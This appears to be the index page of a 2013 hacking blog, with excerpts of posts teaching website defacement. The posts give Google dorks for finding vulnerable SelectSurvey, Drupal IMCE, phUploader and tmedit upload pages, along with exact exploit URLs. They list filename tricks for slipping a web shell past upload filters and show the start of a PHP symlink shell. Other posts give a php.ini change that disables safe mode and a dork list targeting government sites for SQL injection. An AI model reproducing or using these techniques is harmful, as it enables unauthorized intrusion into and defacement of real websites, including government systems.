Thursday, 21 March 2013

Select Survey CMS File Upload Deface

How to deface a website via file upload shell. Assalamualaikum and greetings. In today's entry I want to teach the SelectSurvey CMS exploit. This CMS is built on ASP.NET. The exploit lets you upload an .asp shell. OK, let's start.
1. First, find a vulnerable website with the Google dork: "SelectSurvey.NETv4 site:uk" "SelectSurvey.NETv4" Note: play around with the dork to get more results.
2. Pick one of the websites from the results.
3. Add at...

Drupal IMCE Mkdir Remote File Upload

Defacing with a Drupal exploit. Assalamualaikum and greetings. It has been a while since I posted a deface exploit, hasn't it? OK, today I want to teach you a deface exploit on the Drupal platform. This exploit is actually old, but many websites are still exposed to it, including recent ones :D OK, let's start~
1. First, find a vulnerable site with the Google dork: inurl:"/imce?dir=" intitle:"File Browser" Note: vary the dork to get...

Symlink Sa 3.0

Symlink_Sa 3.0. This shell was made by Sec-w.com. Features:
-> Symlink Bypass
-> Bypass Read
-> Mass Joomla Symlink
-> Mass WordPress Symlink
-> Mass vBulletin Symlink
And many more.
<?php
set_time_limit(0);
error_reporting(0);
$pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$u = explode("/",$pageURL );
$pageURL =str_replace($u[count($u)-1],"",$pageURL );
$pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
$u = explode("/",$pageFTP );
$pageFTP =str_replace($u[count($u)-1],"",$pageFTP...

Bypass 18+ on YouTube

Refer to the picture below. You must have run into this before, right? So how do you bypass it? OK, let's start. Look at the link, it looks like this. Link: http://www.youtube.com/watch?v=1Lu0qhRrIow . Take just the video ID: 1Lu0qhRrIow. Take this link: http://www.youtube.com/v/Masukan ID?fs=1&amp In place of "Masukan ID" (insert ID), put the ID of the video that was blocked. Example for the video link above: http://www.youtube.com/v/1Lu0qhRrIow?fs=1&amp Enter...

How to Deface a Website via File Upload Shell

Assalamualaikum and greetings. Today HMCA wants to teach the SelectSurvey CMS exploit. This CMS is built on ASP.NET. The exploit lets you upload an .asp shell. OK, let's start.
1. First, find a vulnerable website with the Google dork: "SelectSurvey.NETv4 site:uk" "SelectSurvey.NETv4" Note: play around with the dork to get more results.
2. Pick one of the websites from the results.
3. Append to the end of the URL of the website you picked: /survey/UploadImagePopup.aspx or...

Tutorial Bypass Symlink Forbidden

Assalamualaikum and greetings. Today HMCA wants to teach how to bypass symlink forbidden. You must have worked hard to get a symlink, and then suddenly when you try to open the config file it comes back forbidden, right? Like this: That must be really annoying, hahaha.. OK, don't worry, let me teach you how to bypass it :)
1. First, create a php.ini file. Copy the code below:
safe_mode=OFF
disable_functions=NONE
Then paste it into Notepad and save it under the name: php.ini File...

Sunday, 3 March 2013

phUploader Remote File Upload Vulnerability

Google Dork: intitle:Powered By phUploader
Go to Google.com and enter this dork, then look at the search results.
Exploit URL: http://{site.comt}/ path/upload.php or http://site.com/upload.php
Select any website and upload your file there. The website allows uploading .jpg, .png, .gif and .png files only. Anyway, you can upload your deface as .jpg, and mirror websites like zone-h accept it as a defacement. If you want to upload a shell, then upload it as shell.php.jpg. After uploading...

Image Upload Vulnerabilities

Dork: inurl:/editor/tmedit/popups
Exploit Path: /editor/tmedit/popups/InsertFile/insert_file.php
There You Can Upload Shell As Image. Then Your Shell Link Will Be Like http://vulnrablesite.com/images/yourfilehere Find Different Directories To Find Out Your Shell :)
ASP Shell Upload: How To Hack ASP Sites. First You Need To Find The Website Upload Path To Upload Shell. For That Use Google Dorks. Google Dorks: You Can Use "allinurl" Instead Of "inurl" In Google Dorks. Shell Format: Formats: shell.asp;me.jpg shell.asp shell.asp.jpg shell.asp.jpg -...

sql vuln gov

inurl:index.php?id= site:*gov.pl inurl:index.php?id= site:*gov inurl:news.php?id= site:*gov.af inurl:oferta.php?id= site:*gov.af inurl:trainers.php?id= site:*gov.pl inurl:article.php?ID= site:*gov.uk inurl:play_old.php?id= site:*gov.au inurl:declaration_more.php?decl_id= site:*gov.in inurl:Pageid= site:*gov inurl:pagina.php?left= site:*.gov.au inurl:layout.php?id=120'= site:*gov.pl inurl:principal.php?id=123'= site:*gov.uk inurl:standard.php?base_dir= site:*gov inurl:home.php?where= site:*gov.pl inurl:page.php?sivu= site:*.pl inurl:*inc*.php?adresa=...

Shell Upload Via Tamper Data

Hello Hackerz!! Sometimes You're In Trouble Of Uploading Shell In The Server With The "shell.php" Format. So Here's The Solution. Let's Have A Look. At First Install Add-on "Tamper Data" In Mozilla Firefox. Go Here For Tamper Data. Now Change The Shell Name Into ".jpg Format" Like This, shell.php;.jpg shell.php.jpg shell.php..jpg shell.php.jpg shell.php.jpg:; shell.php.jpg%; shell.php.jpg; shell.php.jpg; shell.php.jpg:; Now...